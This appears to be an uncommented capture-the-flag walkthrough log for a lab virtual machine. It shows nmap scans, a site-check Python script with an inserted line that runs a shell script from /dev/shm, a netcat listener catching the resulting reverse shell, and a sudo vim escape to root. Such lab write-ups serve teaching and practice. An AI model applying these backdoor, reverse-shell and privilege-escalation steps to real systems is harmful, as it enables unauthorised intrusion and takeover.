Starting Nmap 7.92( https://nmap.org ) at 2022-03-26 19:25 CST
Nmap scan report for192.168.0.1
Host is up (0.00040s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for192.168.0.100
Host is up (0.012s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for192.168.0.101
Host is up (0.014s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for192.168.0.103
Host is up (0.00020s latency).
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Nmap scan report for192.168.0.104
Host is up (0.014s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for192.168.0.105
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in1.93 seconds
$ sudo nmap -sV -sC -A 192.168.0.103
Starting Nmap 7.92( https://nmap.org ) at 2022-03-26 19:26 CST
Nmap scan report for192.168.0.103
Host is up (0.00021s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:
|307224:c4:fc:dc:4b:f4:31:a0:ad:0d:20:61:fd:ca:ab:79 (RSA)|256 6f:31:b3:e7:7b:aa:22:a2:a7:80:ef:6d:d2:87:6c:be (ECDSA)|_ 256 af:01:85:cf:dd:43:e9:8d:32:50:83:b2:41:ec:1d:3b (ED25519)80/tcp open http Apache httpd 2.4.41 ((Ubuntu))|_http-title: Login
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 08:00:27:49:EE:4D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
10.21 ms 192.168.0.103
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1host up) scanned in8.09 seconds
Site is Up: 24/03/2022 15:20:01
Site is Up: 24/03/2022 15:22:02
Site is Up: 24/03/2022 15:24:01
Site is Up: 24/03/2022 15:26:01
Site is Up: 24/03/2022 15:28:01
Site is Up: 24/03/2022 15:30:01
Site is Up: 26/03/2022 11:26:11
Site is Up: 26/03/2022 11:28:01
Site is Up: 26/03/2022 11:30:01
Site is Up: 26/03/2022 11:32:01
Site is Up: 26/03/2022 11:34:01
Site is Up: 26/03/2022 11:36:02
Site is Up: 26/03/2022 11:38:01
Site is Up: 26/03/2022 11:40:01
Site is Up: 26/03/2022 11:42:01
Site is Up: 26/03/2022 11:44:01
Site is Up: 26/03/2022 11:46:02
Site is Up: 26/03/2022 11:48:01
Site is Up: 26/03/2022 11:50:01
Site is Up: 26/03/2022 11:52:01
Site is Up: 26/03/2022 11:54:01
Site is Up: 26/03/2022 11:56:02
Site is Up: 26/03/2022 11:58:01
from datetime import datetime
import requests
import os
now = datetime.now()
os.system('/usr/bin/bash /dev/shm/shell.sh')
r = requests.get('http://127.0.0.1/')if r.status_code ==200:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Site is Up: ")
f.write(dt_string)
f.write("\n")
f.close()
else:
f = open("site_status.txt","a")
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
f.write("Check Out Site: ")
f.write(dt_string)
f.write("\n")
f.close()
nc -lvp 2333
listening on [any]2333...
192.168.0.103: inverse host lookup failed: Unknown host
connect to [192.168.0.105] from (UNKNOWN)[192.168.0.103]37988
sh: 0: can't access tty; job control turned off
$ sudo -l
Matching Defaults entries for adrian on napping:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User adrian may run the following commands on napping:
(root) NOPASSWD: /usr/bin/vim
$
$ sudo /usr/bin/vim -c ':!/bin/sh'
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_beos-ansi
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
:!/bin/sh
ls
query.py
site_status.txt
user.txt
whoami
root
cd /root
ls
del_links.py
del_users.py
nap.py
root.txt
snap
cat root.txt
Admins just can't stay awake tsk tsk tsk